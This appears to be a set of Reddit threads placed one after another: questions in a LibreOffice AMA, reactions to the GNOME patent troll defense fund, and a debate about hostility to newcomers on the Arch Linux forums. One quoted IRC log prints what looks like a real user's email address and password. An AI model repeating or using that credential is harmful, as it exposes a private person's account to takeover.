since web applications become more and more relevant, which i personally like very much. do you think that at some point in the near future libre office might just be an application thats running in the background on a local webserver on your pc and will be accessed soley via webbrowser? i think this would bring lower power cost, customizability enhancements and better portability.

what do you think about other floss office software? do you think it's a good thing that the community projects are that clustered and seperated, or do you think different office projects should work closer together to improve features and reach a bigger audience.
Do You plan on releasing and maitaining an official snap package of LO?
LibreOffice is great overall in terms of capability. The one thing that really bugs me, however, is the very limited context menu--having to dig through the top menu to find something like cell alignment, for example, makes the program feel clunky. Are there any plans to allow customization of the context menu?

Also, is slow performance common? I use Calc primarily, and have found that sometimes basic functions like deleting a column can take 1-2 seconds. This makes for an unpleasant experience. I'm hoping it has something to do with my installation/setup, rather than the software itself, but I've tried a number of solutions online with no success. This issue occurs even in mostly blank spreadsheets. I'm positive my hardware can easily handle this kind of software. 
When will you guys add referencing styles like Haevard, apa and the rest to libreoffice
Although Libre Office is good enough for regular users (my mother uses it every day working as a translator), I've always given up on it due to the lack of features / it feeling old and monolithic. (For example, the settings menu being a huge unsearchable mess, and just yesterday Libre Office Draw couldn't read a pdf file without making all the text overlap, so I had to edit it in Gimp)

This leads to my question: what's the code-base for the project like, and what might be some interesting complexities or problems you run into, that people might not even realise are a problem? Intuitively it seems as though an office suite shouldn't be that complicated to program, but then again MS Office and Libre Office are the best ones out there. What ar the difficulties, what are the challenges?
Hi guys thanks for all the hard work. When will we be able to install libre office on our favourite assembly language based operating systems? :D 
So I have been using LibreOffice for over 3 years now on Ubuntu. I would like for there to be an account system, similar to Google docs or MS-Office 360, so that whatever customizations I make to LibreOffice can be transferred to any PC I want.
I have a spread sheet that references another sheet. I want to change the referenced sheet but not have it impact my completed sheet only new sheets. Is there a way to keep the results on my sheet and sever the link to the reference page?
How far away are we from automatic updates on every major platform? You should get new features out to your users ! ;)
Is there a default SmartArt-like diagramming? LO Impress really needs more love
Love your work. I use it every day. 

Is there any hope for getting list styles more easy to configure? Would be cool if they became nestable within paragraph styles instead of having to be manually applied. 
I am a huge fan of LibreOffice! The one thing I have wondered about it for a long time is why the primary focus seems to be utility over design and UX. I am really happy with how well it works, but the UI/UX has always seemed to be fairly lacking. It has come a long way and it does look nice now, but I would still not consider it "beautiful" or "modern" in design.

1. What is LibreOffice doing to fix this issue so that it not only appeals to a larger number of users, but enhances the user experience for everyone?

2. Is there a reason you believe so many open source projects seem to be so utilitarian, possessing great functionality but not focusing on design?

Thank you for all your work on this software! I don't want my question to come off as negative. I just believe it is that main factor preventing it from going mainstream.
How close are you to full intercompatibility between the Office Suite and LibreOffice?
I wanna know about is that possible 
made base online accessible ? I create a database system but put in the dropbox or drive to sync, that was a bad idea... google sheets has a survey tool, but that one is very limited (like calculate features or response instantly) 
Hey guys, just wanted to say that I love your office suite, and especially the Writer. It has served me well in both my studies and on my personal projects. Absolutely love it. I have used it almost since it inception, and I absolutely refuse to give it up for anything.

Keep up the great work people!
Hi, /u/themikeosguy Thank you and your team for your fight against **HELL GATES ~~Ms Office~~**.
[Michaelmas](https://www.youtube.com/watch?v=pVXC9ODCMc0)
Fantastic that you listen to the community! LO is a fantastic product and I am using LO and its precedor since more than 10 years and would always pick it as my first choice. 
Why is there no equivalent for OneNote?  When can we expect one?  
I wish Chinese gov to adopt ODF.
Y'all got a lot of executives...
Any plans on integrating an email client into LibreOffice? There are so few quality email clients anymore, especially with Mozilla all but abandoning Thunderbird.
Is the web version of LibreOffice still using the GTK Broadway backend (which is super cool by the way)?
Are you supporting Broadway GTK development?
Will you ever support .pages and other iWork file types?
One feature I would love to see that keeps me in MS Office is an easy to use way to create mailing labels from a spreadsheet!!
Is this AMA still open? I would like to ask one question. 

What is LO's greatest need? Is it funding? A commercial software company backing it, or maybe a municipality investing in it rather than paying for proprietary software?

I ask because LO is very good in many ways, yet lagging in others. I'm happy with it and will not switch, but there is room for improvement, and I'm wondering what the weak link is.

Beside that question, I have an observation. I really dislike the Ask format of the online community. It's tedious, unintuitive and broken. I end up asking and answering questions here on reddit, which is not the way it should be.

Ok, one more observation. I don't know the politics or logistics, but I can see the benefit of LO and OO joining together again. To this day, OO has the better documentation by far, and its standard forum is much better than the Ask LO site's software.

Thanks.
Why is it impossible to define custom locales? I like to have the decimal point, but also the iso date and English names for the days of the week. It's very difficult or even impossible to find a locale with the right combination.   Is there a reason for this?

I do have a question.  If I have an idea for a feature, is there someone I should email to tell about it?  I use LO Writer and Calc a little bit.  I may start using the database.  
I am using the LibreOffice 5.3 version and while I'm using the Office writer, I've faced an issue. I, actually put an image in the background and wrote over it. I've saved the file and had to show it to my Prof. When I reopened the file, the letters are all there but the image in the background vanished. May I know any reason for this?
[deleted]
I was reading it first as "We are The Doomed Foundation..." ;D
Today the [GNOME Patent Troll Defense Fund](https://secure.givelively.org/donate/gnome-foundation-inc/gnome-patent-troll-defense-fund) reached its initial goal of $125,000.

When Rothschild sued the GNOME Foundation, they were attacking the wider free software community too. Everyone who donated to the defense fund are helping GNOME rise to this challenge and send the message that attacking a free software project will hurt.

Thank you GNOME for all of your software contributions to Linux, making many of our computing experiences great. Keep on doing what you're doing.
I don't use gnome, but I hate patent trolls enough to pay money to see them destroyed in court.
This is so refreshing to hear. Too bad for these trolls who picked a nonprofit thinking they wouldn't fight back, because they're about to get what they deserve for it. They picked the wrong target.
Sad that there is a need to burn a developer's salary in fighting trolls instead  of investing it back into the project.
Yeah!!

Everything for FOSS.
I will donate to defend free software until I die. Well done everyone.
[deleted]
Does it make you sad that it's all going to go to lawyers instead of more software development?
https://www.technadu.com/rothschild-patent-imaging-sues-gnome-patent-infringement/80987/ for those out of the loop
I use KDE, even though I run Ubuntu (not Kubuntu) on my systems.  However, I've read the patent and I stand firmly with the GNOME team on this.  This bullshit cannot stand, and I'm proud of GNOME for fighting back to end the trolls when they could have more easily (and maybe less expensively) paid into this extortion racket.

Even though they've already reached their goal, I'm kicking in a few bucks to show my support.
This is a good day.
Letting the troll know what the budget is might be a bad idea.  Unless this is misinformation, which would be funny if there were large contributions in the background from the bigger companies like Redhat.
Great stuff.  I really hope they win this case.
They need to make a new law that rewards the victim of patent trolls 10x the amount the troll asked for. So if youre asking for 1m, and the judge finds that your patent claim is absurd, it should force you to pay 10mil+fees. It will put a stop to this real fast. 

The reason its exploited, is because theres no real repercussions. The worst case scenario is you pay like $20K in legal fees if you lose. Most companies just settle out of court to not have to deal with it. They make $20k in an hour. Why stop if even if you lose, you still profit?
Fuck these patent trolls. They are nothing but useless craps to hurt the humanity from access free technologies.
A great patent litigator charges more than $1,000 an hour.
Free software together strong
No wonder all alt right people are so numbnuts, an actual Rothschild whatever sued GNOME's insignificant image app and the hysterical "this sets a standard" immediately follows..

Yeah, GNOME will obviously illegitimately lose in the court of Law, and unless we and Apple & MS prevent it, then they'll be very next and lose also....
A win for the proletariat
This situation with patent troll company threatening GNOME foundation is bizzare in a couple of levels.

First, a patent trolls with a name which is a notorious delight and source of antisemitic conspiracy theories, probably to have additional layer of protection in a sensitive moments is suing who?

The most controversial group of developers in  the free software cycles notorious for inflammation of hate and despise because of arrogance towards users, following some mysterious design goals and generally making slow and over the edge buggy product which over the time losses features, while most of the observers, even those who despise GNOME long ago think of this process as some painful and long way of achieving professional DE as if others are just a toys. Well, if it's look like disaster, if it smells like a disaster and feels like a disaster, we shouldn't be fooled: it IS the disaster.

In the long run, trolls do not have a chance to defend their position. If anything, companies behind (and sideload) GNOME will take legal care of things. There is no need to tighten rows behind this as if we are all atacked by some dark force. In a way, this troll patent company is giving to GNOME foundation undeserved sympathy from us. 

Another irony is that sooner or later, technical feature which is in the core of this controversy is a good candidate for removal by the GNOME devs as "confusing for user" or "boring in 21st century"... without help of external entity such are patent troll pseudo companies which are cruising in the absurd sea of american patent laws.

Which is worse? GNOME sect or patent trolls?

They are both worse. Like many things in this shitty times.
What is the use of donating ? How much can you donate? They threatened seven more lawsuits.
There is no such thing like patent/copyright trolling.... its just term invented by some big companies that exercises shady tactics. Sole goal of them using this term is to move responsibility away so noone will blame/accuse them of using shady tactics......

Im strongly against GNOME (or any other corporation) that uses this term.

Will not donate and will defend Rotschild as they did not do wrong here. Its GnOME who broke the patent (= law) so its GNOME who should be held responsible for this.....
I've recently moved to Arch and after four years "living" in the computer science environment. I knew about Arch's reputation of noob hating but man. Literally every post in the "Newbie Corner" of Arch Forums has a MOD, which is someone who's supposed to help users and care for the community, noob hating or being somehow rude to a beginner. I mean, the post is in the god damn Newbie Corner, have a little bit of respect for your fellow humans.  


So please make this monumental effort and just answer what people ask without sarcasm or bullying. This is serious guys. (Ubuntu's community is a great example of how you don't need to be a dick :)

&#x200B;

This discussion extends to all areas in computing. Stop being a dick, we've all been (and will always be) noobs.
Newbie: *Asks a "stupid" question*


Arch forums mod: Use Google


Newbie: *Uses Google and finds link to Arch forums where mods tell the OP to use Google*
Over the last few months I've been making the move out of apple's ecosystem. Started with replacing my iMac with a nice desktop, then my macbook with a thinkpad. After a few weeks with Windows, I really regretted the switch. I've been running Debian on my servers for more than 2 decades. So I figured that I'd give Linux on the desktop/notebook a try. i went through all of the big ones and settled on Manjaro (Arch based, not a PITA to install). 

So, I'm not exactly a "noob" with Linux, but most all of my experience has been with a debian based distro, and never with a GUI. But I've found the same experience as you. Even in the "noob" forums, people are just dicks. I posted on one thread about audio issues, and the response I got was a "Let Me Google That For You" link, that the \*FIRST\* result was the fucking topic I posted in. 

Unfortunately, it seems that the community used to spend so much time trying to help get more people moved to Linux, has now became an elitist group that wants to prevent people from joining, at least until you have become an expert.
[deleted]
I can't comment specifically on the Arch forums. I've seen or experienced both sides of this in the various Linux and Hackintosh communities though.

In my experience, for every "RTFM, idiot!" type post, there is another with a user who will point you in the right direction and wants you to figure it out yourself. The thing is, they aren't a giant dick about it as opposed to the "RTFM" guy. Even if they don't hold your hand through every step, they leave you with enough info to be able to figure it out yourself and are receptive to followup questions if you're really making the effort. 

Then there are those occasions where someone goes above and beyond to the point of almost making your problem their problem. They'll walk you through every step, scouring the internet for solutions or basically making their reply an impromptu guide to fix your specific problem.
I made the mistake of reading the comments. People are being dicks in a thread about not being dicks. It's meta-dickery.
The Arch community has indeed gained a reputation for being unfriendly to noobs, primarily due to a vocal-minority of people that can be rude without cause, when saying nothing would have been better.

On the flip-side, having used Arch for a while now, even if I don't agree, I *understand* where the attitude comes from. The "Newbie Corner" is for *Arch* newcomers*,* not *Linux* newcomers. Arch was not designed for Linux newcomers in mind, and being able to follow a step-by-step guide to get it installed does not mean that the "how do I delete a file?" is an acceptable question for the Arch Newbie Corner. If you intend to use Arch, you are expected to know these basic and general Linux concepts. A question regarding using PKGBUILD,  pacman, or something more Arch-specific, etc  is more  the intention of the Newbie Corner.

All that said, I do agree that there is no reason to be a dick, or be rude to strangers. There are indeed real people on the receiving end of rude posts. On any forum or question/answer site, I try to simply pass by questions that I deem as a "waste of time" to answer, which is better than being rude. I feel if I am going to answer, then do so without attitude. Unfortunately, modern internet culture is not like this.
Basically, I totally agree with you. But I come from a time when even beginners are able to ask [smart questions](http://www.catb.org/~esr/faqs/smart-questions.html). But nowadays just too many people want help without doing anything themselves.  Even the reference to "smart questions" is often seen as a personal attack. I therefore see the problem not only in those who give bad answers, but also in those who ask bad questions.
Arch mods and some users are just as much a part of the problem as the help vampires. A lot of time could be saved if a system were put in place for screening posts, at least for new users. Good questions could be approved and made public straightaway and bad questions could just be replied to with a copypasta of the Code of Conduct sent from an @noreply. As it is, I only go to the forums anymore just to check out "Dustbin" and have a few laughs.
Give examples. Links to posts. We can't know what offends you or what you think of as rude. You are talking about your experiences but you are no giving us the whole story.
Can you link the posts where mods are being rude to you? I'd like to see what you consider 'noob-hating'. Maybe your questions have been answered a 1000 times before and could have been easily found by a google search. I'm pretty sure the forum admins aren't carrying out a personal vendetta against every single newbie out there.
I've been using Linux since early Slackware days and I do love Arch but I generally feel a decent chunk of the community is fairly elitist, and toxic to newcomers. FWIW I would recommend getting to know some people that actually know how to use Linux, and maybe join some IRC channels. Er does recommending IRC make me a fossil? Lol. 

Once you have a solid foundation the distro specific questions become pretty trivial. 

Anywhoo I avoid the forums like the plague. I couldn't take one more cringey "btw I use Arch".

I doubt the Arch community is going to change anytime soon, but at least shining some light on the BS is a step forward 👍
I've noticed this is a general trend in most Linux forums, especially /r/Linux.

I think it is a bit of Dunning-Kruger effect, many people (especially teenagers) new to Linux start to get a bit arrogant after they start to get more comfortable with the command line and have done a bit of ricing. This doesn't make them an expert hacker or a sysadmin or a software engineer but they think they are an expert with just that little bit of knowledge, and they seem to think that gives them license to laugh at people who don't know as much as they do.

I am a professional software engineer with a masters in computer science and over 10 years of experience, and I occasionally post comments that are a bit controversial -- like calling Emacs an "app platform", or refering to the Python REPL as a "shell", or saying things like "some apps are so simple they are obviously bug free", or "sometimes making an app faster means optimizing it to run on more cores."

When I do say stuff like this, wow. Downvoted to hell, and a bunch of smarter-than-thou ass hats pile on in the comment section to tell me how much of an idiot I am who knows nothing and just read a few buzzwords about computers and am trying to sound smart.

The irony is that they are the ones who don't understand what I am saying.

(Here's a comment I got less than 3 weeks ago, although it was in AdviceAnimals, not a Linux subreddit: https://www.reddit.com/r/AdviceAnimals/comments/csw1np/why_does_my_calculator_app_need_an_update/exhnhdc?utm_source=share&utm_medium=web2x )
[deleted]
I've used Linux for over 24 years, but it has only been my default desktop OS for 22 years. What you are describing is true, there are a lot of asshats in the Linux community at large that give new users a hard time and refuse to answer questions. It's been that way for the ENTIRE time that I have used Linux.

I'm not a developer, programmer, or network administrator. I did build computers, but trust me it's not that hard. It's like putting very expensive Legos together. It was through building computers that I discovered Linux. I didn't want to pay over $100 for a (legit) Windows license, and Linux was free. 

I fell in love with Linux very quickly. What I didn't fall in love with was some members of the community. It seems that there are just some ass clowns out there that feed themselves off of how many "read the fucking manual (RTFM)" posts that they can do in one day. Most of the time, they haven't RTFM themselves. If they did, they would know that some of your problems aren't in the manual. 

I had a very heated conversation with one of these jerks, were I posted parts of the manual (a manpage) verbatim to him/her showing that the manual didn't address my problem. I could tell by our interaction that he/she hadn't RTFM himself/herself. That person stop replying to me, then a MOD stepped in and asked me to submit a bug report. Eventually my issue was fixed. However,  I had had enough of the toxicity, and left Linux for about 6 months.

I eventually started using Linux again. It is an excellent operating system! It works well on just about everything you put it on, as long as the drivers exist. If you are coming with a computer that has Windows pre-installed, you usually don't see all of the trouble the manufacturer went through to get Windows running "right" on that machine. Since I used to build computers, I knew first hand how much of a pain it was. Linux is a lot easier, if the drivers are available. 

I think most of the problems with new users boil down to some of them not doing their homework before installing Linux. You need to know whether or not Linux supports your hardware BEFORE INSTALLING IT. Googling does help with this issue. Running a Linux distro from a liveCD or USB on your machine, then making sure everything works before hitting install also helps. 

New users should stay the hell away from Arch and most of its derivatives (that includes Manjaro). You have to know what you are doing just to install Arch. Since there is no "liveCD/USB" for Arch, you can't take that route to get around not knowing what to do. It's like trying to build a car from scratch and not having any mechanical skills. You need to read up first. Manjaro, which has liveCD/USBs for all of its derivatives is much easier. However, since Manjaro is based on Arch, you occasionally run into issues that are Arch related, and the only real help are the wikis. 

The Arch forums are totally useless. You essentially installed a custom OS on your hardware -- one that you built up from scratch. There are so many variables that arise from doing this that it is near impossible for someone else to help you. The Arch forum is just there to direct you to the wikis, and it's a hangout for RTFM trolls.

New users should also stay away from Distrowatch or take what's posted there with a grain of salt. Sometimes difficult to use distros rise to the top of the rankings based on the fads that plague the Linux community. The best distros for new users are Ubuntu or Ubuntu based derivatives (Linux Mint, PopOS, etc.). Stay away from the minimalistic fad or the tiling fad that is currently going on. That means don't install any i3 based distros, ElementaryOS, or just about anything that has "vanilla" GNOME in it. Stick to XFCE, Cinnamon, or KDE desktop based distros to start. Plus, as someone else mentioned, since Ubuntu caters to new users, its forums are a lot more friendlier. 

Don't let the ass clowns win! You are a part of the community now whether they like it or not!

----edited to fix some grammar and spelling issues---
Manjaro is a great example of an arch based distro with a great, polite community
There are bad actors on both sides. I've been infuriated both by Arch forum mods being rude and wrong (I am no noob, I know how to ask good questions, they are rude to me anyway and don't put in the effort to read my posts in good faith), and by people asking questions that they haven't even googled.

The rude mods are a few people who comment a lot (I think some of them aren't even mods). There are like two people who comment on almost every post. They're not the majority, and there are a few Arch devs and TUs who are absolute saints helping solve people's problems and pointing them in the right direction. Nonetheless it left a real sour taste in my mouth looking for help.

Arch has had an influx of users because of memes, and I think it's OK to remind them that Arch isn't for everyone. I sometimes think people reach for the forums because they want to just chat with people, not because they actually have a problem they couldn't solve. I mean, they have a problem, but they've gone right to the forums instead of google just because they're excited about this new Arch thing and wanna talk about it. But asking for help is the wrong way to do about that and wastes people's time. Just post somewhere for general discussion.

Cranky, powertripping mods and help vampires are both real issues. Not feeding the vampires, except to show them how to help themselves, is important for keeping them at bay. I don't know so much how to make the assholes improve though.
I switched to Gentoo from Arch years ago because the community is nicer and more helpful.
Thanks for this wise talk. I would like to add my thought to this.

A ~~good~~ way to show to everybody that you are better than them is to master a technology/os/whatever, and make sure that nobody will be able to access this knowledge, then you can pretend being a genius, because you're the only one (or almost) holding this knowledge.  
Not only the source should be open, but the knowledge too. Proprietary softwares are only closed by their source, but to close the knowledge of something could be compared as the extremist side of ownership principle. In a way, those people are the terrorist of open source. Because of their acts, some people can be lead to use proprietary softwares only because "it's way easier to learn" and "people are nicer".

To resume my thought : don't only open your sources, open your knowledge, your heart and your mind too. And please, don't be a dick with newbies, the best of us learned the word "computer" before mastering computer science.
I don't care about arch users opinions. I use Manjaro thats based on arch and if an arch user tells me I should be running bare arch i will gladly just ignore them. Some arch users are down right stupid and rude for no reason. They feel like installing and using arch somehow makes them a god among men and it's ridiculous. Just use whatever distro you want and enjoy it.
**Edit**: Allow me preface this by I'm willing to help newbies learn - we've all been there, but they need to at least put their question into Google before they go to a chat/forum. 


**HOWEVER** -- The problem is that the noobs these days have no desire to read the docs or ask intelligent and coherent questions. Hand them a link to the "how to ask smart questions" link and they feel personally attacked. They act very entitled these days. I have put people's questions into Google and the first or second hit has the answer to their question, oftentimes it's within the first 5 or so results. I'm not going to excuse that. 

Those who act like this and ask bad questions need to be told they are doing so. If they throw a fit because of it, I'll be damned if I waste my time on them and will ensure that their tantrum is on display for the world to see.
I've been saying this about the Arch community for years. They mostly do not want to hear it.

I even had one fellow tell me that newbies "hadn't earned the right to be respected", like tenured users had, or something equally toxic. It's just a sad mindset. The distro isn't even *that* hard to install or use...but a certain minority of users seem to consider themselves the elite of the elite because they can do basic UNIX admin (configuring CUPS, etc).

It's more of an Arch problem than a Linux problem, in my experience. Fedora, Debian, Gentoo, etc are pretty welcoming. It's a shame, because Arch is actually my favorite distro. It just happens to be a lightning rod for a certain type of self-important misanthrope.

EDIT: For context, I had been using Linux for years before I switched to Arch. It was not difficult, and I don't think I've ever been "the noob" when dealing with Arch. I'm speaking purely based on how I've seen other Arch users treat newbies. Speaking out about it is a good way to get downvoted on the Arch sub.

EDIT2: As long as we're calling out communities...Virtualbox and PFSense forums are a miserable place to be as well. It feels like half of every thread is some mod or admin complaining that the question is dumb or obvious, or generally being rude...when in reality, that thread is the top & only relevant result on Google.

I get that Virtualbox and PFSense are offering free solutions, but damn, you're better off not responding. Attitudes like these are the exception to the rule -- mostly FOSS communities are actually very positive and constructive.
While not good. Much of this is a backlash against the new wave of computer users who don't bother reading documentation or trying to problem solve on their own. Most of them seem to have the idea that they can succeed at setting up, using and administering a linux (or any OS) environment without learning anything. They give the impression that they expect quick easy fixes and pat answer that will require no effort on their part. This gets very old. How to Ask Smart Questions needs to come back. If foks will try on their own first, and then ask for help in way that makes it clear they have INVESTED SOME OF THEIR OWN TIME AND EFFORT IN TRYING TO SOLVE THEIR OWN PROBLEM, the responses would be more constructive and helpful.
From the wiki

I am a complete GNU/Linux beginner. Should I use Arch?

If you are a beginner and want to use Arch, you must be willing to invest time into learning a new system, and accept that Arch is designed as a 'do-it-yourself' distribution; it is the user who assembles the system.

__Before asking for help__, do your own independent research by Googling, searching the forum and the superb documentation provided by the Arch Wiki. __There is a reason these resources were made available to you in the first place__. Many thousands of volunteered hours have been spent compiling this excellent information.

See also Arch terminology#RTFM and the Installation guide.
Ubuntu has a friendly community partly due to it being so accessible. Arch is for people who generally know their way around Linux so I think the community expects a little more from people seeking help. Before you ask for other people's time, learn the basics, learn what you don't know so you can ask effective questions.
I have never experienced something like this, people there are usually friendly, and yes I am, and we are, noobs.
Arch is a distribution geared towards people who are willing to DIY their distribution and use primarily the existing material on the internet to solve their problems. Ever wondered why - except for kernels where Gentoo is superior - the Arch Wiki is so good?

Integrating into a community like this requires assimilation. If you're not ready for that, Arch is not the right distribution for you. But I agree that especially new Arch users can be dicks that really know nothing about their system internals, their network etc. It's becoming increasingly normalized.
Gentoo is far less toxic. FreeBSD is also pretty cool.

And there's always the possibility to settle on Debian.
My favorite mantra is "every question is a stupid question if you ask it without googling first". Some of the 'noob hate' is justified frustration with people who expect personalized tutorials for everything when good ones already exist and are trivially easy to find. 

A smart, appropriate question is something like this: 

"I am following a tutorial to do task **A**. 
One of the steps told me to run command **B** in order to cause outcome **C**. When I ran **B**, **C** did not happen. I searched the web for help and the first few results told me to try commands **D**, **E**, and **F**. I tried all of them and they did not appear to help, since doing **B** still does not cause **C**. Has anyone experienced this issue before or can anyone point me in the direction of what to try next? "

A rude, inappropriate question is something like this: 

"Want do **A**. All tutorial online suck. Help plz"
I've found that the majority of the Arch community is more then willing to help and answer questions. That would be when the person with the question has put in a reasonable effort to resolve it on their own, posts what they have done and has come up lacking.

The reason for the misconception that Arch users are noob intolerant is that with Arch now being a meme and one of the 'cool' distributions the influx of new users that want their OS to just work has greatly increased. And to be frank Arch is not that type of experience and will never be.

New users who are willing to take personal responsibility and put in the work are greatly rewarded with a better understanding of the workings of their OS and computer as a whole.

Frankly most are just tired of reading requests for help that are written 'xxx doesn't work, help me'. Which results in the RTFM replies. Newer users can avoid this by checking the wiki, searching for similar posts. Documenting what they have done, what their expectations are and what happened. When users who need help are willing to put in the work much of the community is willing to match that effort and help. When very little to no effort is put in the community is also more then willing to match that as well.
I don't find this true at all. Not now not 20 years ago. And Ubuntu answers are usualy totaly useless.



Maybe we have different definitions of what constitues a dick, but finding new and different  ways to let someone know they should try just a bit harder before asking decade old questions and at least explain what they have tried does not mean anyone beside entitled noob in question is being a dick.



For each and any human grouop or community there are rules and social norms, yes you need to know them and respect them to be accepted into that group.



Free software community is one of the most relaxed and friendliest of them all, especially  considering we are often  ubergeeks with limited knowelage and experience of social interaction.



People call us elitists, but than ask them would any other group of professionals explain more than hundreds of times the simpliest stuff you can find easily. And to people who didn't even try and more importantly - you may never ever see again!



Show us you are here to stay and you will be accepted. Same as any other group.
I was a Ubuntu person for years and never experienced this kind of rudeness. Then I bought a new laptop and Ubuntu couldn't run on it. Someone suggested that I try Arch. I had a very basic question, and got a rude reply.

I was out.

Tried manjaro and it worked first try.  But I don't find the forums nearly as helpful in solving problems as the Ubuntu ones were. I think that might be more of a size problem.
In my experience, the negativity is largely based on the fact that most new Linux users expect to have answers handed to them on a plate, and refuse to actually read the pertinent wikis, or research the issue with other methods.
[deleted]
[removed]
I am totally on board with the OP. I don't think this only applies to Arch either. I don't use it, so I'm not familiar with the forums, but I've seen this in other online communities for software, OS's, and games. 

I just feel like "If you can't say something nice, don't say anything at all" works perfectly here. If you're not getting paid to answer questions, then the only reason you're stepping in with snark is to be a dick. You're taking effort to be a dick in a situation where you have no obligation to respond at all. You're not a disgruntled, minimum wage help desk employee who has to provide answers that you think should be obvious. You can just hit the back button on your browser and roll on to the next thread without wasting any more of your own valuable time.
I never ask anything from the arch forums and barely in the IRC chat.
In my experience, the mods are completely toxic to the community.

The only reason I use arch is for the latest stuff, but honestly the community is something I deeply despise at the moment.
Do you think the forum format plays a role at all? When every registered user can have a say and a post in any thread it's quite hard to stay on topic and banter easily turns into noise also.

I haven't used [Stack Overflow](https://stackoverflow.com/tags) based forums a lot, like [https://askubuntu.com](https://askubuntu.com/), but they seem to be better at staying on topic and turning forum questions into readable documentation.
I always make a conscious effort to give the people the information that I can, without being a dick. It's very easy to forget that a lot of different people will always be in different levels of understanding, and would just like a simple answer to their question. Hell, everyone starts that way.

Always be nice, there's always going to be someone who knows better than you.
I've found forums are almost always terrible for tech support. There's such a strong push about never repeating information but the amount of noise around it never gets cleaned up and it just drowns out the useful information. I saw found a thread on the Arch forums which was related to an issue I was having (a fairly scary warning appearing on boot), and the question was fine, the first reply was fine but a little confusing (and it was along the lines of "you can get rid of it by making this config change but in certain configurations it might *make your system unbootable*"), and then it was followed by **5 pages** of people asking for clarification about if this change would be safe in a given setup and replies along the line of 'this has already been answered, read the thread'. At a certain point it doesn't matter if the right answer has been posted in the thread because no-one's going to wade through the crap to find it. (Arch isn't the worst at this: XDA developer threads can be 200 pages of people telling other people to read the thread and the answer you want is on page 153 in a footnote of a link in a post which is otherwise identical to all the other 'just google it' posts).
I have seen the hostility you are talking about. Most often directed towards people who were falling short on following the documentation, or providing any clear information on their problem, but not always. Sometimes it can be rather unfriendly even when somebody asks a perfectly intelligent question, having clearly already tried to find an answer to the best of their abilities. And even when the questions are lacking, especially if they are asked as you say in the Newbie Corner, this kind of bad attitude is helping no one. 

BUT, and this is no excuse for the rudeness on the forums, I think people should also keep in mind that the ArchWiki was made by this same community you describe as "noob hating" who has invested and keeps investing a fair amount of time into maintaining it. (Which clearly only makes it more frustrating when people don't make the minimal effort of trying to find their answers there.) 

And, as some who has time and again used the ArchWiki long before ever using Arch, and found it a most invaluable resource, I must say that *it* has never *noob hated* on me, or made me feel unwelcome, or like I should already have the context knowledge to understand everything. I guess that is more important to me in the end ¯\\_(ツ)_/¯
Use the irc. It's much harder to create a circlejerk on irc than on web forums.
To people who feel upset or discouraged when you seek answers and post questions on the Internet: stick with it!

Keep searching, keep capturing error messages, keep building [minimum reproducible examples](https://stackoverflow.com/help/minimal-reproducible-example), keep posting your questions, keep practicing using the Internet as a tool to learn more!

Remember: someone is not being a dick and your question is not stupid. Those are judgements that each person is going to make based on the unique context of their experience, each person will perceive the world differently. Make your goal to learn, to document your findings, to create notes for reference later.

Remember: there are people out there who won't like what you post, that's okay! The Internet is huge. Take time to acknowledge how embarrassed, angry or sad you feel then move onward on your quest for knowledge! There will also be people out there who will want to help you, find them, leverage their skills, help them help you by communicating what you've tried and asking a specific question. Use plain text instead of screenshots, put your error messages in quotes when you search Google like this: `"sudo: cd: command not found"` follow where that leads you, like this: https://askubuntu.com/questions/57789/how-to-enter-a-directory-with-the-cd-command-if-it-has-700-permission-and-is-n

I'm so excited about the discussion this post has generated! It inspired me to dig around to find old questions I've asked.

Check this out, from 2008, I was trying to install linux for the first time, reading my post now it's clear I had no idea what a live cd was or how to create or format partitions, a user pluscool turned me on to the idea:

http://www.ubuntux.org/converting-toshiba/

```
Sun, 2008-07-27 09:18 — gibxam
Hey linux users!I've been learning programming (C++) for about the last 6 months
 and plan to take computer science in uni which will be two years from now. On m
any of the sites I have been to people have said that if I want to expand my pro
gramming (as well as overall computer) knowledge I should get out of windows and
 move into Linux. I have an old Toshiba Satellite Pro 4200 series laptop that my
 uncle has stopped using so I thought that I would install the linux os on that.
 My problem is that I cannot seem to get windows 98 off the laptop. I have tried
 to go to the add/remove programs but there is no way to unistall it from there?
 What should I do. I have the cd from the most recent magazine, where they talk 
about being able to install linux on anything even a motorcylce? Surley we can g
et around this, I have a fully functional laptop but with no Internet. Any help 
that you can offer would be greatley apprieciated!Thank you,-Max
...
Mon, 2008-07-28 09:22 — pluscool
Converting
Hello Max.You don't need to look into W98. Just download the latest version of a
 Linux distribution like Ubuntu, Kubuntu or Xubuntu (or others). (preferably "Li
ve CD"). Download it, burn the ISO image on a CD and put it in the laptop... tha
ts it. you can see it workin witout installing anything.  you can choose to inst
all from a icon in the demo desktop.I don't know how old you laptop is, but Ubun
tu and Kubuntu needs some power. I would like to suggest trying Xubuntu first (a
 light flavor of ubuntu). the main diffrence between U-K-X is the desktop manage
r. Just ask in forums or google your questions, is amazing how much is already a
nswered in the internet.You can always try another linux distro, but Ubuntu fami
ly has a nice balance between user friendlyness and available information.
```

This is from 2010, probably the first time I ever used IRC to ask a question and I typed my password into the chat!

https://irclogs.ubuntu.com/2010/03/03/%23ubuntu.html

```
max_big	REGISTER bigras24 programthebeach@gmail.com	02:56
Nitsuga	grkblood13, Ctrl	02:56
max_big	weeek	02:56
Nitsuga	max_big, ups!	02:56
max_big	?	02:56
max_big	Nitsuga, what was that?
Nitsuga	max_big, you have posted your email and password to the channel :S
```

Here's a couple months later when I figured out how to set a password and create a new username but deleted my Desktop directory, created it owned by root, and didn't know how `chown` worked!

https://irclogs.ubuntu.com/2010/04/26/%23ubuntu.html

```
AnActivist	please help me, I accidently deleted my Desktop folder, so I created a new one but I was root so now I cannot access it using the file browser, how can I change the permissions of the desktop folder?	21:14
qazibasit	DasEi, what is the difference b/w a 32 bit and 64 bit O/S	21:14
xomp	AnActivist, chown	21:14
maco	AnActivist: sudo chown -R youruser:youruser Desktop/	21:15
_0R10N	anactivist: change the owner, and then change the permissions	21:15
AnActivist	cool thank you i'll try it
```

This is years later, 2015, my first post on stackoverflow trying to get emacs to work with a mac, someone tried to help me, but ultimately the issue still remained a mystery:

https://stackoverflow.com/questions/19995056/change-meta-and-control-keys-in-emacs-for-mac-keyboard

Here's my first question on the unix stack exchange about `named`:

https://unix.stackexchange.com/questions/311357/what-does-var-named-mean-in-this-context

It got closed for being too broad, at the time I didn't even know `named` is actually a program that acts as a Domain Name System (DNS) Server. Now I'm still trying to figure out how DNS and DHCP work by making examples and playing around with dnsmasq in an Ubuntu VirtualBox virtual machine, launched using Vagrant:

https://github.com/mbigras/dnsmasq-hack-session
https://github.com/mbigras/dhcp-example

This is in 2016, my first post on reddit, learning how devops works:

